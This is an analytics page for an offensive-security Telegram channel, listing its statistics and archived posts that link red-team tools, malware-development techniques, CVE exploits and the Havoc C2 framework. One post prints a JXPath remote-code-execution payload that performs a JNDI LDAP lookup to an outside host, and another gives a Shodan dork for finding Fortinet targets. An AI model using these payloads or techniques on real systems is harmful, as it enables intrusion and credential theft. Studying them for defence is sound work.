APT

前往频道在 Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

显示更多

俄罗斯45 663 技术与应用8 841...

📈 Telegram 频道 APT 的分析概览

频道 APT (@apt_notes) 英语语言赛道中的是活跃参与者。目前社区聚集了 14 653 名订阅者，在 技术与应用 类别中位列第 8 841，并在 俄罗斯 地区排名第 45 663 位。

📊 受众指标与增长动态

自 невідомо 创建以来，项目保持高速增长，吸引了 14 653 名订阅者。

根据 11 六月, 2026 的最新数据，频道保持稳定运转。过去 30 天订阅人数变化为 406，过去 24 小时变化为 16，整体触达仍然可观。

认证状态： 未认证
互动率 (ER)： 平均受众互动率为 48.83%。内容发布后 24 小时内通常能获得 N/A% 的反应，占订阅者总量。
帖子覆盖： 每篇帖子平均可获得 7 154 次浏览，首日通常累积 0 次浏览。
互动与反馈： 受众积极参与，单帖平均反应数为 18。

📝 描述与内容策略

作者将该频道定位为表达主观观点的平台：
“This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

凭借高频更新（最新数据采集于 12 六月, 2026），频道始终保持新鲜度与高覆盖。分析显示受众积极互动，使其成为 技术与应用 类别中的关键影响点。

14 653

订阅者

+1624 小时

+1087 天

+40630 天

7 154

帖子浏览量

无数据24 小时

无数据48 小时

48.83%

参与率

无数据

每日帖子数

Ads index

beta

帖子存档

14 658

Repost from Ralf Hacker Channel

Новые сюрпризы в AD CS... Добавим технику ESC11🙈 https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/ #ad #pentest #redteam

14 658

💤 laZzzy This is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques. Features: — Direct syscalls and native functions; — Import Address Table (IAT) evasion; — Encrypted payload (XOR and AES); — PPID spoofing; — Blocking of non-Microsoft-signed DLLs; — etc. https://github.com/capt-meelo/laZzzy #maldev #loader #cpp #redteam

14 658

🥷 PNG Steganography Hides Backdoor Malware authors rely on LSB encoding to hide malicious payload in the PNG pixel data, more specifically in LSB of each color channel (Red, Green, Blue, and Alpha). https://decoded.avast.io/martinchlumecky/png-steganography/ #maldev #steganography #png

14 658

🛠 DynamicSyscalls This is a library written in .net resolves the syscalls dynamically (Has nothing to do with hooking/unhooking) https://github.com/Shrfnt77/DynamicSyscalls #maldev #csharp #syscall #library

14 658

Repost from Offensive Xwitter

😈 [ ShitSecure, S3cur3Th1sSh1t ] I really like DeepL for translations. But I also like the fact, that when using the Desktop APP is makes use of an signed executable named CreateDump.exe in %APPDATA%, which can dump e.g. LSASS 🧐🤩 🐥 [ tweet ]

14 658

⚙️ Psudohash — Password List Generator For Orchestrating Brute Force Attacks This is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. https://github.com/t3l3machus/psudohash #wordlist #password #generator #bruteforce

14 658

Bash Aliases for CrackMapExec Modules CrackMapExec has one of the coolest features - "Audit Mode". This features makes life easier for a pentester by masking the password in the CME output. However, most often a pentester needs this functionality only as a one-time action, take a screenshot and disable it. That's why I wrote a simple Bash Alias that allows you to turn "Audit Mode" on and off with a single command. As a bonus, I've implemented an Alias for the bh_owned module. This can be useful if you haven't received a BloodHound dump yet and a module error is annoys you. Just include these lines in your ~/.zshrc or ~/.bashrc and enjoy. Aliases:

alias CMEOwned='awk '\''/bh_enabled/{ if ($3=="False") {$3="True"} else {$3="False"}; {if($3=="True") {print "\033[1;92m" "[+] BloodHound Owned: "$3} else print "\033[1;91m" "[-] BloodHound Owned: "$3}} {print > FILENAME }'\'' /root/.cme/cme.conf'

alias CMEAudit='awk '\''/audit_mode/{ if ($3=="") {$3="*"} else {$3=""} {if($3==""){print "\033[1;92m" "[+] Audit Mode: Enable"} else print "\033[1;91m" "[-] Audit Mode: Disable"}} {print > FILENAME }'\'' /root/.cme/cme.conf'

#cme #bash #alias #bloodhound #audit #masking

14 658

⚔️ Katana — Web Crawler A next-generation crawling and spidering framework. Features: — Standard/Headless — Customizable Config — JavaScript parsing — Scope control https://github.com/projectdiscovery/katana #web #crawler #tools #bugbounty

14 658

Repost from Offensive Xwitter

😈 [ an0n_r0, an0n ] here is the proper way to RC4 encode with OpenSSL compatible with SystemFunction032 (use the raw hex key instead of passphrase). awesome shellcode exec method from @ShitSecure 👍 https://t.co/renlMV0rsE 🔗 https://s3cur3th1ssh1t.github.io/SystemFunction032_Shellcode/ 🐥 [ tweet ][ quote ]

14 658

🔑 Abuse Kerberos RC4 (CVE-2022-33679) This blog post goes into detail on how Windows Kerberos Elevation of Privilege vulnerability works and how to force Kerberos to downgrade the encoding from the default AES encryption to the historical MD4-RC4. The vulnerability could allows an attacker to obtain an authenticated session on behalf of the victim and also lead to arbitrary code execution. Research: https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html Exploit: https://github.com/Bdenneu/CVE-2022-33679 #ad #kerberos #rc4 #exploit

14 658

Repost from Информационная безопасность

Phishing campaigns Сделал github репозиторий, в котором представлены разборы/отчёты об фишинговых кампаниях APT группировок, которые содержат пример писем, с помощью которого осуществлялась рассылка. Зачастую разборы атак APT группировок не содержат примеры писем, это побудило меня создать репозиторий в котором будут отчёты/разборы, которые точно содержат фишинговое письмо. Постепенно данный список будет пополняться Link: https://github.com/wddadk/Phishing-campaigns #apt #git #phishing

14 658

🌀 Unique Subdomain Enumeration Great research regarding subdomain enumeration through permutations, unique approach that can provide good results with a smaller initial bruteforce data set in comparison to altdns Research: https://cramppet.github.io/regulator/index.html Tools: https://github.com/cramppet/regulator #subdomain #enumeration #permutation #tools

14 658

⚙️ Apache Commons Jxpath (CVE-2022-41852) This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. If your application uses JXPath library, you might be vulnerable. According to CVE information, all methods for XPath processing are vulnerable, except for except compile() and compilePath(). If user can provide value for the XPath expression, it might allow him to execute code on your application server. Payload:

jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");

PoC: https://github.com/Warxim/CVE-2022-41852 Research: https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/ #apache #commons #jxpath #cve #exploit

14 658

Repost from Offensive Xwitter

😈 [ dafthack, Beau Bullock ] Finding cleartext creds in AD user attributes is something that happens more than most might think. Great demo John! Here's a 1-liner to find these while leveraging PowerView: https://t.co/ZItkN8BjZ9 And here's one for Azure AD: https://t.co/IcCHRYPrE5 🔗 https://gist.github.com/dafthack/5f8c36f7468fad991e9e1f6d81ec29d4 🐥 [ tweet ][ quote ]

14 658

🔑 YubiKeys Relaying Attack That is, the APDU packets that the server application wants to get signed by a private key to verify the identity of the authentication. This attack works on all PIV Smart Cards. Research: Relaying YubiKeys Part 1 Relaying YubiKeys Part 2 Tools: https://github.com/cube0x0/YubiKey-Relay #ad #2fa #fido2 #ybikeys

14 658

📄 Detecting ADCS Web Services Abuse (ESC8) One of the popular attack vectors against Active Directory Certificate Services is ESC8. This article covers detecting irregular access to some ADCS web services exposed, as well as detecting the NTLM relaying itself. https://medium.com/falconforce/falconfriday-detecting-adcs-web-services-abuse-0xff20-9f660c83cb36 #adcs #detection #esc8 #blueteam

14 658

⌛ Attacking Predictable GUID Few penetration testers and bug bounty hunters are aware of the different versions of GUIDs and the security issues associated with using the wrong one. In this blog post walk through an account takeover issue from a recent penetration test where GUIDs were used as password reset tokens. https://www.intruder.io/research/in-guid-we-trust #web #pentest #guid #account #takeover

14 658

😈 Fortinet RCE (CVE-2022-40684) Fortinet recently patched a critical authentication bypass vulnerability in their FortiOS, FortiProxy, and FortiSwitchManager projects (CVE-2022-40684). This vulnerability gives an attacker the ability to login as an administrator on the affected system. Shodan Dork: product:"Fortinet FortiGate" Research: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/ PoC: https://github.com/NagliNagli/BountyTricks/blob/main/CVE-2022-40684.yaml Exploit: https://github.com/horizon3ai/CVE-2022-40684 Detection for SOC: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/ #fortinet #rce #research #poc #exploit

14 658

Repost from Offensive Xwitter

😈 [ pdiscoveryio, ProjectDiscovery.io ] The Ultimate Guide to Finding Bugs With Nuclei by @v3natoris https://t.co/2GY3QZlTft #hackwithautomation #cybersecurity #infosec #bugbounty 🔗 https://blog.projectdiscovery.io/ultimate-nuclei-guide/ 🐥 [ tweet ]

14 658

Repost from 1N73LL1G3NC3

Havoc is a modern and malleable post-exploitation command and control framework Features: Client - Modern, dark theme based on Dracula Teamserver - Multiplayer - Payload generation (exe/shellcode/dll) - HTTP/HTTPS listeners - Customizable C2 profiles - External C2 Demon - Sleep Obfuscation via Ekko or FOLIAGE - x64 return address spoofing - Indirect Syscalls for Nt* APIs - SMB support - Token vault - Variety of built-in post-exploitation commands